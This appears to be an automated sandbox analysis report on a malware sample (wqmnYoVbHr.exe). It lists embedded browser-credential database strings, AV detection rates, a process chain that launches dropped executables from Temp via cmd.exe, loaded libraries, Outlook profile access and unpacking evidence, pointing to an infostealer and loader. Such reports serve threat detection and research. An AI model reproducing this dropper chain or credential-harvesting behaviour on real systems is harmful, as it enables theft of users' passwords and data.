Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: wqmnYoVbHr.exe, 00000000.00000003.2187810182.0000000022C28000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000003.2172578801.0000000022C34000.00000004.00000020.00020000.00000000.sdmp, CFIIIJJKJKFHIDGDBAKJ.0.dr, FBKJKEHIJECGCBFIJEGI.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: wqmnYoVbHr.exe, 00000000.00000002.2310723689.000000001CCB3000.00000004.00000020.00020000.00000000.sdmp, wqmnYoVbHr.exe, 00000000.00000002.2323371001.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: wqmnYoVbHr.exe ReversingLabs: Detection: 52%
Source: wqmnYoVbHr.exe Virustotal: Detection: 43%
Source: AFHDAKJKFC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe File read: C:\Users\user\Desktop\wqmnYoVbHr.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\wqmnYoVbHr.exe "C:\Users\user\Desktop\wqmnYoVbHr.exe"
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe"
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe" Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: wqmnYoVbHr.exe Static file information: File size 2515456 > 1048576
Source: wqmnYoVbHr.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x222e00
Source: Binary string: mozglue.pdbP source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323785085.000000006CAFF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: wqmnYoVbHr.exe, 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\wqmnYoVbHr.exe Unpacked PE file: 0.2.wqmnYoVbHr.exe.580000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe Unpacked PE file: 8.2.AFHDAKJKFC.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kvnoqpwr:EW;skikhnnm:EW;.taggant:EW;
